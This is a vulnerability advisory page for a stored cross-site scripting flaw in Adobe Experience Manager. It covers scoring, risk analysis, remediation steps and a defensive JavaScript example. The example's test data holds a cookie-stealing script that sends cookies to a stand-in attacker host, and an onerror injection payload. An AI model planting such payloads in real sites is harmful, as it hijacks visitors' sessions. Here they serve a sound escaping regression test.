Description
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Published: 2026-03-11
Score: 5.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross-Site Scripting
Action: Immediate Patch
AI Analysis

Impact

The vulnerability is a stored XSS (CWE‑79) in Adobe Experience Manager 6.5.23 and earlier. A low‑privileged attacker injects JavaScript into a form field whose value is stored and later rendered, unescaped, to other users; when those users browse to the page, the script runs in their browser under their session, so it can read data the victim can reach and perform actions as the victim. The impact is confined to the victim's browser context and does not by itself provide system compromise.

Affected Systems

Affected products are Adobe Experience Manager, version 6.5.23 and all earlier releases. The CPE entries added on 2026‑03‑11 cover Adobe Experience Manager generally, AEM as a Cloud Service, and the 6.5 LTS line (base and SP1), so both on‑premises and cloud deployments should be treated as in scope.

Risk and Exploitability

The CVSS 3.1 score of 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) indicates medium severity: the attack is network‑reachable and low complexity, but the attacker needs a low‑privileged account and the victim must browse to the page that renders the stored field (UI:R). Scope is changed because the script executes in the victim's browser rather than in the component that stored it; confidentiality and integrity impact are rated low and availability is unaffected. The EPSS score below 1% and the SSVC assessment recorded in the history (Exploitation: none, Automatable: no) suggest a low current probability of exploitation, and the vulnerability is not listed in CISA's KEV catalog. Exploitation requires an attacker to create or edit a form field with malicious JavaScript; the attack surface is user‑generated content displayed to other users, so any staff or customers who view the affected forms are potential victims.

Generated by OpenCVE AI on March 17, 2026 at 15:34 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the Adobe Experience Manager release that fixes this issue (e.g., 6.5.24 or later for 6.5 deployments); confirm the exact release against Adobe's security bulletin, since this page links no vendor advisory.
  • If patching is not possible immediately, restrict which low‑privileged accounts can create or edit the affected form fields, and review field values already stored in the repository for injected markup: escaping on output does not remove what an attacker has previously saved.
  • Verify that every stored field value is escaped on output for the context it is rendered into (HTML text, attribute, URL, or script) rather than relying on input filtering alone, and treat a Content Security Policy as defense in depth, not as the fix.
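To make the escaping check concrete, the following JavaScript is an added example written for this page, not code from Adobe or from AEM, and it does not reproduce the vulnerable AEM component, which the advisory does not identify. It contrasts the pattern behind CWE‑79, a stored form‑field value concatenated straight into markup, with escaping on output for the HTML text and attribute contexts, and adds a small regression check that flags any stored value whose rendering produces more tags than the template itself. The submissions array, the field names, the payloads and the renderer functions are all constructed for illustration.

```javascript
// Added example for this page (not Adobe/AEM code). Sample form submissions are
// constructed for illustration; ids, field names and payloads are hypothetical.
const SUBMISSIONS = [
  { id: 1, field: "comment", value: "Looking forward to the release." },
  // Classic stored-XSS payload: sends the viewer's cookies to an attacker host.
  { id: 2, field: "comment", value: "<script>location='https://attacker.invalid/?c='+document.cookie</script>" },
  // Attribute break-out followed by an event-handler injection.
  { id: 3, field: "comment", value: '"><img src=x onerror=alert(document.domain)>' },
  // Harmless text containing angle brackets; must survive escaping intact.
  { id: 4, field: "comment", value: "5 > 3 && 2 < 4" },
];

// Escape for HTML text and double-quoted attribute contexts.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern (CWE-79): the stored value is concatenated into markup as-is.
function renderFieldUnsafe(s) {
  return `<div class="field" data-id="${s.id}"><span class="label">${s.field}</span><p>${s.value}</p></div>`;
}

// Hardened: every untrusted value is escaped on output for the context it lands in.
function renderFieldSafe(s) {
  return `<div class="field" data-id="${escapeHtml(s.id)}"><span class="label">${escapeHtml(s.field)}</span><p>${escapeHtml(s.value)}</p></div>`;
}

// Count start and end tags in a rendered fragment. Heuristic: a '<' followed by an
// optional '/' and a letter opens a tag, which is how browsers tokenize markup;
// a bare "2 < 4" is not a tag.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z][^>]*>/g) || []).length;
}

// Regression check: render an empty submission to learn how many tags the template
// itself produces, then report the ids of submissions whose rendering adds tags.
function findMarkupInjections(render, submissions) {
  const baseline = countTags(render({ id: 0, field: "", value: "" }));
  return submissions.filter((s) => countTags(render(s)) > baseline).map((s) => s.id);
}

console.log("unsafe renderer, injected by submissions:", findMarkupInjections(renderFieldUnsafe, SUBMISSIONS));
console.log("safe renderer, injected by submissions:  ", findMarkupInjections(renderFieldSafe, SUBMISSIONS));
```

Run it with node; the unsafe renderer is flagged by submissions 2 and 3, the escaped renderer by none, and submission 4 renders correctly in both. The check counts tags rather than grepping for `<script`, so it also catches the attribute break‑out in submission 3; it is a test‑time guard for templates, not a substitute for escaping. In AEM specifically, HTL applies context‑aware escaping by default, so the places to review are components that use `context='unsafe'`, JSP scriptlets, or client‑side `innerHTML` assembly of field values, together with the field values already stored in the repository.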



Advisories

No advisories yet.

History

Wed, 11 Mar 2026 14:30:00 +0000

Type | Values Removed | Values Added
First Time appeared | | Adobe Experience Manager
CPEs | | cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*
     | | cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*
     | | cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*
     | | cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*
Vendors & Products | | Adobe Experience Manager

Wed, 11 Mar 2026 14:15:00 +0000

Type | Values Removed | Values Added
Metrics | | ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 11 Mar 2026 12:00:00 +0000

Type | Values Removed | Values Added
First Time appeared | | Adobe
                    | | Adobe Experience Manager
Vendors & Products | | Adobe
                   | | Adobe Experience Manager

Wed, 11 Mar 2026 01:00:00 +0000

Type | Values Removed | Values Added
Description | | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Title | | Adobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)
Weaknesses | | CWE-79
References | |
Metrics | | cvssV3_1: {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: adobe

Published:

Updated: 2026-03-11T13:38:38.325Z

Reserved: 2026-02-18T22:02:41.385Z

Link: CVE-2026-27255

Vulnrichment

Updated: 2026-03-11T13:28:58.507Z

NVD

Status : Analyzed

Published: 2026-03-11T01:16:56.077

Modified: 2026-04-06T14:19:05.733

Link: CVE-2026-27255

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-20T14:38:25Z

Weaknesses